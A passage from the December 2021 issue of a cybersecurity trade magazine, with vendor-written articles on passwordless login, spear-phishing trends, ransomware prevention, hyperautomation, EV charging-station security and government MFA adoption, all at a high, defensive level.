surface. By simply using a smartphone, security key, or plat<strong>for</strong>m authenticator, users can securely log<br />
into a workstation and corporate domain, without ever typing in a password. Passwordless authentication<br />
removes user frustration while ensuring the highest level of password security – by eliminating the<br />
password altogether. Leading companies such as Aetna/CVS Health, most major banks in the United<br />
States, airlines and insurance companies have all adopted passwordless technologies.<br />
Moving <strong>for</strong>ward, passwordless authentication will certainly be the norm, particularly since the Federal<br />
Financial Institutions Examination Council (FFIEC) recently issued a guidance on effective authentication<br />
and access risk management practices <strong>for</strong> the various parties that access financial institution services<br />
and systems. Microsoft, in particular, is taking the lead in incorporating this technology and making it nonnegotiable<br />
<strong>for</strong> entities with data to secure (or, all entities). In fact, a Digital <strong>Defense</strong> Report recently<br />
distributed by Microsoft shows continued attacks from other nation-states that weren’t necessarily via<br />
exploitations of software, but rather well-known techniques such as password spray and phishing. This<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 58<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
just highlights how vulnerable most organizations are to attacks, and how widespread the antiquated use<br />
of passwords is amongst the population.<br />
With the number of digital touchpoints increasing <strong>for</strong> companies across the board, MFA alone – and MFA<br />
rooted in password security – will continue to become less and less secure <strong>for</strong> both brands and<br />
consumers. With countless pieces of data and dollars to lose, neither party can af<strong>for</strong>d to put their<br />
in<strong>for</strong>mation at risk. Under the FFIEC’s guidance, and with Microsoft at <strong>for</strong>efront, Passwordless MFA is<br />
the way of the future.<br />
About the Author<br />
Bojan Simic is the Interim CEO, Chief Technology<br />
Officer and Co-Founder of HYPR. Previously, he<br />
served as an in<strong>for</strong>mation security consultant <strong>for</strong><br />
Fortune 500 enterprises in the financial and insurance<br />
verticals conducting security architecture reviews,<br />
threat modeling, and penetration testing. Bojan has a<br />
passion <strong>for</strong> deploying applied cryptography<br />
implementations across security-critical software in both the public and private sectors. His extensive<br />
experience in decentralized authentication and cryptography have served as the underlying foundation<br />
<strong>for</strong> HYPR technology. Bojan also serves as HYPR’s delegate to the FIDO Alliance board of directors,<br />
empowering the alliance’s mission to rid the world of passwords.<br />
Bojan can be reached online on LinkedIn, Twitter and at our company website https://www.hypr.com.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 59<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Can Your <strong>Cyber</strong>security Culture Stand Up to the Latest<br />
Spear Phishing Techniques?<br />
By Josh Yavor, Chief In<strong>for</strong>mation Security Officer, Tessian<br />
Gone are the days of bulk spear phishing attacks, where hackers send scam emails and malicious<br />
attachments to as many people as possible and hope <strong>for</strong> a bite. Spear phishing techniques are growing<br />
more targeted and sophisticated, according to new data from Tessian that sheds light on the latest attack<br />
methods.<br />
Tessian’s report analyzed two million malicious emails that bypassed traditional email defenses like<br />
secure emails gateways within the past year. It found that hackers are targeting employees with more<br />
tailored emails that reap big rewards, like wire transfer fraud. Account takeover attacks are also a major<br />
threat that costs businesses $12,000 on average.<br />
With emails bypassing defenses, humans are left as organizations’ last line of defense against these<br />
email scams. But it’s unreasonable to expect each employee to be a cybersecurity expert and identify<br />
these attacks every time. Instead, organizations must build a strong cybersecurity culture that<br />
encourages people to flag suspicious activity and empowers them with the tools they need to stay secure<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 60<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
on channels like email. This starts with understanding the latest threats and building a cybersecurity<br />
culture around them.<br />
The State of Spear Phishing<br />
Who is being targeted and when?<br />
Tessian’s report found that the average employee receives 14 malicious emails per year, but that number<br />
jumps significantly <strong>for</strong> highly targeted industries. For example, retail employees received 49 malicious<br />
emails per year, while manufacturing employees received 31. Those sectors are also experiencing<br />
staffing shortages from The Great Resignation, leaving employees stressed, distracted and potentially<br />
more vulnerable to falling <strong>for</strong> a scam. These risks must be prioritized as companies navigate hiring and<br />
turnover challenges.<br />
Bad actors try to trick employees by sending malicious emails in the late afternoon, hoping to slip past a<br />
tired or distracted employee. The most common times <strong>for</strong> spear phishing emails to be sent was 2 p.m.<br />
and 6 p.m. Bad actors also take advantage of the holidays by offering “too good to be true” deals. The<br />
biggest spike in malicious emails came immediately be<strong>for</strong>e and after Black Friday.<br />
What’s the latest attack playbook?<br />
Impersonation techniques continue to be a go-to strategy in the spear phishing playbook. Tessian found<br />
that display name spoofing was the most common tactic, found in 19% of malicious emails. These attacks<br />
use deceptive display names on an email to mislead employees. For example, a display name might<br />
show the first and last name of the company's Chief Financial Officer requesting a wire transfer. While<br />
the email address itself may still look suspicious, a recipient often only looks at the name of the sender<br />
and could mistake it <strong>for</strong> a legitimate request.<br />
Domain impersonation, on the other hand, happens when bad actors secure a domain that looks like it<br />
belongs to a legitimate business. This technique was used in 11% of malicious emails. The brands most<br />
likely to be impersonated were Microsoft, ADP, Amazon, Adobe Sign and Zoom.<br />
What are bad actors after?<br />
Tessian’s analysis found that tricking users into downloading malware remains a common motive of<br />
phishing emails. Malicious links still prove to be a popular and effective technique, with almost half (44%)<br />
of malicious emails containing a URL.<br />
Our researchers found more emails related to wire transfers than credential theft, suggesting<br />
cybercriminals are still largely focused on financial gain. For example, they’re more likely to try to steal<br />
money by impersonating a vendor and requesting a payment than by posing as an IT person requesting<br />
an employee’s password.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 61<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Building a <strong>Cyber</strong>security Culture from The Ground Up<br />
These attacks are evolving and growing more sophisticated every day. Having a strong cybersecurity<br />
culture is more important than ever to ensure employees can work both securely and productively. Rather<br />
than getting in their way, an effective cybersecurity culture images employees as part of the solution while<br />
providing the tools they need to stay secure.<br />
This involves a layered approach, starting with creating a transparent, shame-free environment that<br />
encourages employees to admit to mistakes or share when something feels off. Unless employees feel<br />
com<strong>for</strong>table flagging, suspicious emails or alerting IT when they’ve clicked a malicious link, security<br />
teams won’t know how or when they are being targeted. Essentially, they’ll have zero visibility into these<br />
threats.<br />
The next step is relevant, ongoing training. Employees should be trained using the latest and most<br />
relevant examples, such as real-world phishing emails. For example, they should see real examples of<br />
those “too good to be true” scams be<strong>for</strong>e the holiday season and should know to look out <strong>for</strong> spear<br />
phishing emails late in the afternoon. Automation and machine learning tools can also be used to provide<br />
in-the-moment training tailored to specific employees based on their role, tenure and location.<br />
But even with training, people will make mistakes like clicking a malicious link or sharing login credentials.<br />
Businesses need to take an advanced approach to email security to stop the threats that do get through.<br />
Relying on employees to identify and outwit threats 100% of the time will leave an organization<br />
vulnerable. The right security tools can provide an added layer of defense and support employees without<br />
disrupting their workflow.<br />
About the Author<br />
Josh Yavor is CISO at Tessian, leading in<strong>for</strong>mation security,<br />
threat intelligence, and security research. Most recently he<br />
served as CISO <strong>for</strong> Cisco Secure and led cloud security <strong>for</strong><br />
Duo Security, with earlier stops at Facebook, Oculus, and iSEC<br />
Partners. Josh is an aspiring woodworker and recovering<br />
middle school teacher. Learn more about Josh on Twitter and<br />
at Tessian.com.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 62<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
3 Best Practices to Avoid Inevitable Ransomware Attacks<br />
Tips to mitigate and protect against the ongoing threats of ransomware<br />
By Jesper Zerlang, CEO, LogPoint<br />
The total cost of ransomware in <strong>2021</strong> totals $20B and is expected to climb to $265B by 2031. With new<br />
ransomware attacks occurring every 11 seconds and the average incident resulting in nearly $700,000<br />
in damages, no industry is safe from the war against ransomware. In <strong>2021</strong> alone there has been headline<br />
breaking ransomware attacks on large organizations such as Colonial Pipeline, Brenntag, and JBS<br />
Foods.<br />
While cybercriminals rely on an array of tactics to breach a network, such as database hacking and<br />
denial-of-service attacks, phishing is the number one delivery method <strong>for</strong> ransomware. Throughout the<br />
pandemic, as the majority of businesses rapidly moved their work<strong>for</strong>ce remote, the number of<br />
ransomware attacks only continued to climb, up 150% in 2020.<br />
These numbers aren’t slowing and it’s up to organizations to understand how they can protect their data<br />
and their employees’ in<strong>for</strong>mation from a catastrophic attack, which could ultimately cost them millions.<br />
However, as the number of threats increase, businesses must look to find the right solutions to better<br />
protect, detect and respond to today’s complex threats. And while some require implementing new<br />
security tools and technology, others are as simple as changing protocols and priorities within the<br />
organization. Below are three tips to help any organization, large or small, in their ef<strong>for</strong>ts to increase<br />
cybersecurity and mitigate the risk of a ransomware attack.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 63<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
1. Build a strong cybersecurity foundation<br />
When thinking of cybersecurity, it’s natural to think of the innovative technologies available on the market<br />
today. However, there are so many steps that should be taken in-house to help to establish a secure<br />
network be<strong>for</strong>e introducing these additional technologies. Building the foundation <strong>for</strong> protecting your data<br />
starts with the basics, especially considering that these advanced technologies can only do so much if<br />
the foundation is not set.<br />
Patching, having secure configurations and following password best practices, such as ensuring strong<br />
password hygiene across the organization and incorporating two-factor authentication, are all basic<br />
needs to ensure a hacker cannot easily gain access to a network. While these may seem small, the<br />
protection they offer is mighty and effective, and with these measures in place, advanced technologies<br />
can be implemented in parallel to help build a stronger, <strong>for</strong>ceful security posture <strong>for</strong> the overall<br />
organization.<br />
2. Stay “in the know”<br />
With the increase in cyberattacks, the government has been busy introducing new regulations and<br />
compliance standards. These will likely not go away – in fact, they will likely become stricter, with heavy<br />
fines <strong>for</strong> those organizations who do not comply. Being aware of the current state of the industry and the<br />
threats impacting fellow businesses can help you to understand what the risks are, how you can protect<br />
yourself and what may be introduced into the regulatory landscape in the near future.<br />
For example, it’s no secret that the need <strong>for</strong> a single plat<strong>for</strong>m that can both detect and respond to a threat<br />
is greater than ever be<strong>for</strong>e. Some organizations are finding that by integrating Security In<strong>for</strong>mation and<br />
Event Management (SIEM) with Security Operation Automation and Response (SOAR), they can help<br />
introduce the automation necessary to respond to even the most complex threats quicker than ever<br />
be<strong>for</strong>e, minimizing the need <strong>for</strong> human intervention. This reliable, automated protection enables<br />
organizations to respond in real-time and provides them with the situational awareness necessary to help<br />
predict the following phase of an attack.<br />
Technology like this is actively changing the industry and the way organizations prepare <strong>for</strong> ransomware<br />
attacks. Being aware of these types of innovations can help an organization better understand the<br />
benefits, help a business stay ahead of the industry trends and be ready <strong>for</strong> when these technologies<br />
become the regulatory standard in cybersecurity.<br />
3. Don’t <strong>for</strong>get about transparency<br />
As with any business challenge, being open and communicative is the only way to ensure alignment<br />
across teams. From security operations to IT and enterprise risk management, aligning on objectives is<br />
critical to ensure any and all gaps are covered in the protection of the organization. Without consistent<br />
collaboration and transparency between each lead department, the likelihood of an attack only increases,<br />
jeopardizing the critical data within the network.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 64<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
For example, an employee may become a target of a phishing scheme, recognize the warning signs, and<br />
simply delete the email. However, shortly after, an employee in another department could receive the<br />
same email and fall victim to the attack. Departments tend to work in silos with the belief that cybersecurity<br />
sits with only IT team and only the IT team. Yet, if the first employee had made the IT team aware of the<br />
phishing email, they could have warned the remainder of the organization be<strong>for</strong>e the second employee<br />
had fallen victim. <strong>Cyber</strong>security it a team ef<strong>for</strong>t and working together to stay goal-orientated amid the<br />
battle against ransomware is often one of the best <strong>for</strong>ms of protection <strong>for</strong> any organization.<br />
It’s no longer if, but when.<br />
Ransomware is a cyberthreat that is constantly impacting our society, and organizations are no stranger<br />
to the term. However, there is still the overarching question of “how does my business ensure protection?”<br />
It’s safe to say that no organization is completely safe, as cybercriminals are actively targeting each and<br />
every industry – but there are ways to increase and prioritize protection. <strong>Cyber</strong>security is an ongoing<br />
priority that should be top of mind year-round. Building a strong foundation, staying educated and aware<br />
of current technology and being transparent with partner departments within the organization are just the<br />
start. However, taking the initiative to start is the first step in securing your data against the next<br />
ransomware attack.<br />
About the Author<br />
Jesper Zerlang is the CEO of LogPoint and has led LogPoint to become<br />
one of the dominant SIEM vendors in Europe. He has more than 25<br />
years’ experience in the IT industry and has held top management<br />
positions at Telia Company, Dell Computer and Compaq. His strong<br />
customer and partner focus, passion <strong>for</strong> his employees and strong<br />
entrepreneurial spirit helps to spark innovation and growth at LogPoint.<br />
He has supplemented his leadership skills with executive management<br />
programs at Harvard Business School. Jesper can be reached at<br />
https://www.logpoint.com/en/.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 65<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The Benefits of Hyperautomation<br />
By Nathan Hull, Principal Solutions Architect, Technologent<br />
Hyperautomation – in short is the process of automating business automation. At least that is the goal.<br />
The term itself was coined by Gartner in 2019 and implies an actual framework <strong>for</strong> scaling business<br />
automation by combining complementary technologies to augment business processes. The benefits of<br />
hyperautomation extend beyond the simple cost savings of reduced overhead by automating tasks.<br />
Hyperautomation reduces the cost associated to implement business process automations and enhances<br />
the utilization of other technologies such as ML and AI within the organization. By increasing process<br />
efficiencies and boosting productivity there are many other tangible benefits. For example, improved<br />
customer perception of the organization by being able to increase the speed of product or service<br />
delivery. Hyperautomation also creates the opportunity <strong>for</strong> business and process improvement. As more<br />
workflows are digitized there is more data that can be collected, analyzed, and ultimately translated into<br />
more effective business decisions.<br />
Foundation is key! If I could stress only one common component in the successful implementation of<br />
technology projects, it would be just that. Having mature business processes in place and having a<br />
crystal-clear vision of what a process should be prior to taking on any type of automation project is highly<br />
recommended. At the end of the day, business process automation typically mimics what an individual<br />
user would do to complete a set of tasks. If the individual per<strong>for</strong>ming the tasks being modeled is<br />
completing them incorrectly, it isn’t going to be very beneficial <strong>for</strong> the organization. Having defined goals<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 66<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
and outcomes is essential <strong>for</strong> project success and implementing Hyperautomation is no exception.<br />
Business automation almost always encompasses multiple organizational units. For instance, there is<br />
typically need <strong>for</strong> IT governance and oversight as well in-depth insight from the process owner that is to<br />
be automated. There<strong>for</strong>e, to be most effective the business must be the driver of adoption and have<br />
appropriate executive sponsorship to prevent interdepartmental challenges from hindering the success<br />
of the project. How well processes are understood by both or multiple parties and having well established<br />
inter departmental communication is critical. Identifying the appropriate automation tools to construct a<br />
hyperautomation framework is also an important factor. For instance, if there are regulatory or<br />
organizational compliance guidelines that must be met, having automation tools that can support those<br />
policies is obviously key in developing an appropriate solution.<br />
Once an organization has a clearly defined use case <strong>for</strong> hyperautomation, it is a general best practice to<br />
initially limit the number of processes or tools to be automated. Trying to combine an excess number of<br />
tools or automate too many processes in a short time frame can prove to be extremely challenging and<br />
increase the potential <strong>for</strong> negative impact on an organization. As complexity increases so does the risk<br />
of project failure. Starting small and detailing success criteria can prove immensely valuable once you<br />
are ready to expand the scope of your hyperautomation project.<br />
Hyperautomation security is an important consideration and should be evaluated accordingly based on<br />
the organizations security policy and any overarching regulations or compliance mandates. Security<br />
policies regarding business automation systems are generally more focused on access controls given<br />
the nature of the products themselves. The majority of the tasks are transactional, and it is uncommon<br />
<strong>for</strong> the systems to store data within the plat<strong>for</strong>m itself. However, the possibility of a malicious user gaining<br />
access to sensitive data via an automation tool is plausible. If a malicious user were to utilize the tool<br />
itself to gather sensitive data from automated actions the impact could be rather substantial. Regarding<br />
access controls, it is important to understand the difference in roles between the hyperautomation<br />
components as well the user roles they take on to complete the automations. As an example, the<br />
hyperautomation of HR onboarding does not necessarily require the automation components to have the<br />
same permissions as an HR employee. The HR employee will likely have a much more expansive role<br />
and access to many systems unrelated to those necessary to per<strong>for</strong>m the onboarding tasks. Keep in<br />
mind that the permissions allocated to the automation systems should meet only the requirements to<br />
per<strong>for</strong>m the expected tasks and nothing more.<br />
Other security concerns may exist depending on the organization such as varying geographic regulations,<br />
privacy laws, etc.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 67<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
As with any system that is critical to business continuity, appropriate safeguards should be implemented<br />
to protect the business from system failure. Concepts such as high availability, disaster recover, etc., are<br />
an important factor when considering what role automation will have in your business. Setting appropriate<br />
service level expectations will assist in the supportability of the plat<strong>for</strong>m and assist in the adoption of<br />
these technologies.<br />
Ultimately hyperautomation proposes a more complete path <strong>for</strong> organizations to realize the benefits of<br />
automation and will likely have a profound impact on multiple areas of business in the future.<br />
About the Author<br />
Nathan Hull, Principal Solutions Architect <strong>for</strong> Technologent.<br />
With more than 15 years industry experience Nathan works with<br />
clients as a trans<strong>for</strong>mational IT consultant. He assists<br />
organizations in solving strategic, operational, and technological<br />
challenges. Carrying a reputation <strong>for</strong> motivating and inspiring<br />
teams through the well-organized, efficient implementation of<br />
emerging technologies.<br />
Nathan can be reached online at on the company website http://www.technologent.com/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 68<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Electric Vehicle Charging: The Next <strong>Cyber</strong>attack Frontier<br />
By Prof. Thomas R. Köhler, Member of the Board of Juice Technology AG<br />
The International Energy Agency estimates the global number of electric cars, buses, vans and heavy<br />
trucks on the road to reach 145 million by 2030. In the U.S. estimates are that 28 million EVs will<br />
be sold within that timeframe, in concert with the administration’s goal of 50% of new car sales to be<br />
electric by 2030. This will create a significant demand <strong>for</strong> more public charging stations and <strong>for</strong> flexible<br />
options like portable chargers that operate at home or on the road. Within each charging operation lies<br />
millions of lines of code and a wealth of personal and network data. The global cybercriminal community,<br />
always looking <strong>for</strong> new ransomware possibilities, will find this highly valuable data ripe <strong>for</strong> attack. One<br />
U.K.-based security research company, Pen Test Partners, already found, with several charging devices<br />
tested, that a cybercriminal could remotely gain control of the device, enabling the criminal to read user<br />
data or even hack into the owner’s home network via a wallbox. Researchers found vulnerabilities<br />
occurring in both home devices and charging networks.<br />
Un<strong>for</strong>tunately, the EV industry – car manufacturers, charging station suppliers, networking solutions and<br />
service providers – have not made cybersecurity a top-of-mind priority. While businesses in other sectors<br />
have made strides in better protection of their data and networks, many vending machines, <strong>for</strong> example,<br />
are better protected than charging stations.<br />
The specific risks caused by vulnerable charging stations and unprotected components are plentiful.<br />
Insufficient data protection can lead to user data leaks, manipulation of billing systems, ransomware<br />
demands to infrastructure operators to prevent denial of service attacks and gaining illegal access to<br />
businesses’ internal networks.<br />
Lack of advanced cybersecurity measures can also have devastating impact on the charging station<br />
operations, causing distress to operators and consumers. <strong>Cyber</strong>criminals can steal charging current,<br />
bring down the network with a denial-of-service attack, and even risk the stability of the local or area-<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 69<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
wide electricity network due to repeated, simultaneous switching on/off of the charging current. It can<br />
also damage the vehicle battery being charged.<br />
All of these risk factors make a good case <strong>for</strong> the EV industry to implement cybersecurity practices that<br />
will protect EV customer data, as well as prevent network hacking and the potential costly loss of<br />
operation. In this era of concerns about compliance and data privacy the EV industry, notably charging<br />
station networks and suppliers, also cannot af<strong>for</strong>d data breaches that will damage customer confidence<br />
and corporate image.<br />
ISO/IEC 27001 Certification<br />
First and <strong>for</strong>emost, ISO cybersecurity certification should be required <strong>for</strong> any business charging station<br />
supplier – whether they be portable chargers or networking applications that drive the charging operation,<br />
or any component that is tied to a network and thus vulnerable to a cyber threat. Compliance with<br />
ISO/IEC 27001 is considered the most important cybersecurity certification worldwide. It demonstrates<br />
that measures <strong>for</strong> ensuring in<strong>for</strong>mation security and data protection have been implemented and are<br />
regularly monitored and reviewed. This proof is essential to developing a secure charging infrastructure<br />
and to protecting data generated by EV users, industry business partners, other supplier partners and<br />
investors.<br />
A Software-First Strategy<br />
Bringing the charging industry into advanced 21 st century cyber defense practices will be challenging.<br />
Many suppliers are “old world” thinkers, the “plugs and cables” hardware companies. The other side of<br />
this are startups who look at software security as an add-on, who've never focused that closely on<br />
software. They tend to underestimate the diverse range of sources of cyber threats that deficient software<br />
security can pose.<br />
Both types need to change their mindset to “software-first.” After all, charging stations have long since<br />
been highly complex, software-controlled systems that are equivalent to IoT nodes. They must cope with<br />
huge volumes of data streams, whether in communication with the vehicle to be charged, in<br />
communication with the electricity network, or in communication with user authentication and usage<br />
billing services.<br />
These are data streams that offer numerous points of attack <strong>for</strong> malicious parties, not to mention the<br />
physical access to the actual devices. U.K. researchers found that, in one case, a simple screwdriver<br />
was all that was needed to access the inner workings of the devices. The issue of vulnerability applies to<br />
popular charging stations and portable chargers with IoT connectivity. What is also notable is that security<br />
research in this area is lagging in spite of the growing adoption of EVs and increase in private and public<br />
charging stations.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 70<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Going <strong>for</strong>ward, EV dealers, charging infrastructure suppliers and partners should look <strong>for</strong> products that<br />
are built with a software-first approach, products that are designed from the start with data and networking<br />
security in mind. In this manner, charging stations can offer consumers a safe, secure method of charging<br />
their EVs.<br />
Creating Community<br />
Lastly, to make charging cyber safe will take a holistic approach that frankly doesn’t exist yet in the EV<br />
industry. When suppliers do consider security, they usually only think about their own domains. For<br />
example, the car manufacturer only thinks about their vehicle, the charging network operator about their<br />
stations, the energy providers about their network, and the billing service providers about their payment<br />
transactions.<br />
Given how the EV industry is still early days in the U.S. the industry has a great opportunity to share<br />
cybersecurity research, share ideas on common data security problems and, working in concert, present<br />
consumers with a growing choice of secure charging options.<br />
If a major data breach were to hit a charging network that will no doubt create a lack of consumer<br />
confidence. However, if the EV industry gets ahead of the game in cybersecurity, everybody - consumers,<br />
suppliers, and network operators – can win.<br />
About the Author<br />
Thomas R. Koehler is CEO of German technology consultancy CE21 and a<br />
board member of Swiss charging specialist JUICE TECHNOLOGY. Thomas<br />
has a degree in business in<strong>for</strong>matics from Wuerzburg University and was<br />
appointed research professor from the Center of International Innovation at<br />
Hankou University (CN). He has founded multiple companies (web<br />
development, software) and has a background in strategy consulting. He is the<br />
author of more than a dozen books on technology topics, including the English<br />
language books “Reorganizing Data and Voice Networks” (Artech House),<br />
“Understanding <strong>Cyber</strong> Risk” (Routledge Publishers / Taylor&Francis) and “The<br />
Digital Trans<strong>for</strong>mation of the Automobile” (Mediamanufaktur”).<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 71<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Will Multi-Factor Authentication (MFA) Implementation<br />
Protect Countries from <strong>Cyber</strong>criminals?<br />
By Marcin Szary, CTO and co-founder, Secfense<br />
American Login.gov service, the UK National Health Services Login application, the Czech DNS registry,<br />
the Swedish educational system eduID. These are just a few of many government applications from<br />
around the world, whose security is now protected by Multi-Factor Authentication (MFA). More and more<br />
heads of states, including the president of the United States Joe Biden, are calling <strong>for</strong> the implementation<br />
of MFA. Will this step protect countries from cybercriminals?<br />
The popularity of MFA, i.e. the use of an additional component when logging in to the application (a one<br />
time code, cryptographic U2F key or other <strong>for</strong>m of additional authentication) grows noticeably.<br />
<strong>Cyber</strong>criminals don’t waste their time, and fast digitalization of everyday life only makes things better <strong>for</strong><br />
them. We buy online more and more often, so the number of online transactions is growing. Enterprises<br />
are investing in cloud technologies, businesses are moving to the virtual world. This stimulates the<br />
audacity of cybercriminals, which in turn pushes governments into introducing stricter and stronger<br />
cybersecurity regulations. Today, the need to protect against cyberattacks is not an extra consciousness,<br />
but simply a necessity.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 72<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How does this relate to MFA? Well, multi-factor authentication ensures that the person sitting on the other<br />
side of the monitor is exactly who they say they are. By implementing MFA, organizations can secure<br />
their data so it cannot be accessed by any bad actor who has stolen logins and passwords. The<br />
technology giants have known about it <strong>for</strong> years.<br />
The recent research shows that the global size of the MFA market will grow from USD 11.1 billion in <strong>2021</strong><br />
to USD 23.5 billion by the end of 2026. However, many companies have previously recognized the<br />
pressing need <strong>for</strong> global MFA adoption in their organizations. Facebook, Google and Twitter were the<br />
first to implement this technology. Another, such as CA Technologies, Vasco Data Security International,<br />
RSA Security LLC or Symantec Corporation, anticipating in 2016, the growth of the market, just then<br />
began large investments in research and development in this area.<br />
My way or the highway<br />
There is no need to convince anyone about the effectiveness of MFA as the technology giants have<br />
already battle tested it. Google corporation has kept 85K employees from getting phished since 2017. A<br />
recent declaration proving that MFA is the ‘must have’, comes from Mark Risher, Sr Director of Product<br />
Management at Google. On May 6 <strong>2021</strong>, he in<strong>for</strong>med the media that soon Google account holders will<br />
be <strong>for</strong>ced to use multi- factor authentication if they still want to use the company's services.<br />
And you can't be surprised at all because, today no company network is no longer a secure castle that<br />
cannot be accessed by outsiders. On the contrary - the growing number of applications in the cloud,<br />
working from home and from unsecure networks means that every person who appears in our network<br />
must be treated as an intruder. This approach is called the zero trust security model where the key to<br />
effective data protection is making sure we know who the person sitting on the other side of the screen<br />
is. Without this certainty, no security measures are effective.<br />
A Google study found that simply adding a recovery phone number to an account prevents nearly 100%<br />
of automated bots attacks, 99% of mass phishing attacks, and 66% of targeted attacks.<br />
Too expensive, too hard<br />
So why is MFA - considered by experts to be one of the most effective methods of protecting the user<br />
against identity theft - yet still used on a handful of applications and not organization-wide?<br />
The main problem with the widespread adoption of MFA in public organizations and institutions is the<br />
complexity and costs. The implementation of multi-factor authentication throughout the entire<br />
organization, requires a lot of capital and time. The highly heterogeneous IT environments, to which it is<br />
difficult to match the right tools, are also a big obstacle.<br />
One of the approaches to cybersecurity is the user access security broker approach which simply adds<br />
MFA between the application and the user. The security broker is placed as an intermediary layer that<br />
blends into the application, giving full control not only over the authentication phase, but over the entire<br />
user session. Importantly, such action does not require any programming work. It frees from the vendor<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 73<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
lock-in, and lets organizations take advantage of any MFA method, including the latest and safest<br />
authentication standards, such as FIDO2.<br />
The example comes from above<br />
Due to the fact that MFA is a method that effectively protects organizations against phishing and<br />
credential theft, governments of many countries around the world have also become interested in its<br />
adoption.<br />
A few months ago, on May 12, <strong>2021</strong>, there was big news in the cybersecurity world - the president Joe<br />
Biden signed an executive order to improve the nation's cybersecurity. The order called <strong>for</strong> the<br />
implementation of two-factor authentication (2FA) <strong>for</strong> the entire government within 180 days. And at<br />
September's Authenticate Virtual Summit, users, experts and vendors from around showed many case<br />
studies of how strong authentication helps with securing online identities. Participants, including<br />
representatives from the UK's National Health Service (NHS), US’s login.gov and the Internal Revenue<br />
Service (IRS), agreed that authentication and protection of digital identities is a top priority today and in<br />
the future.<br />
FIDO2 rules<br />
<strong>2021</strong> has shown that the way world governments think about MFA is fundamentally changing. The role<br />
of FIDO2, a global, open authentication standard developed by the FIDO consortium and then approved<br />
by the W3C (World Wide Web Consortium), is growing rapidly. It seems that FIDO2 authentication is no<br />
longer just yet another authentication option but it is becoming the preferred choice of many government<br />
institutions as well as private organizations.<br />
How does it look in practice? For example, the governmental Canadian Digital Service has implemented<br />
hardware security keys that support all FIDO2-based methods. The authentication process with their help<br />
is very simple - when logging in, e.g. to email, you have to enter the password and additionally<br />
authenticate by inserting the security key into the USB port and pressing a button. In case of CZ.NIC, the<br />
Czech DNS registry, also accredited by the national digital identity provider and by eIDAS mojeID,<br />
800,000 users can log in to government services based on FIDO2 from September <strong>2021</strong>. In Sweden, a<br />
digital identity system has been implemented in the educational eduID portal with support <strong>for</strong><br />
authentication using the Universal Second Factor FIDO (U2F) protocol.<br />
In the USA, the American Login.gov service is based on the FIDO2 standard as well, and in the United<br />
Kingdom the UK National Health Services Login application uses biometrics. Similar practices are<br />
followed by the Korean government - a second component, fingerprint biometrics <strong>for</strong> 14 million users -<br />
and Thailand, has a dedicated website that helps organizations set up multi-factor authentication using<br />
FIDO technology.<br />
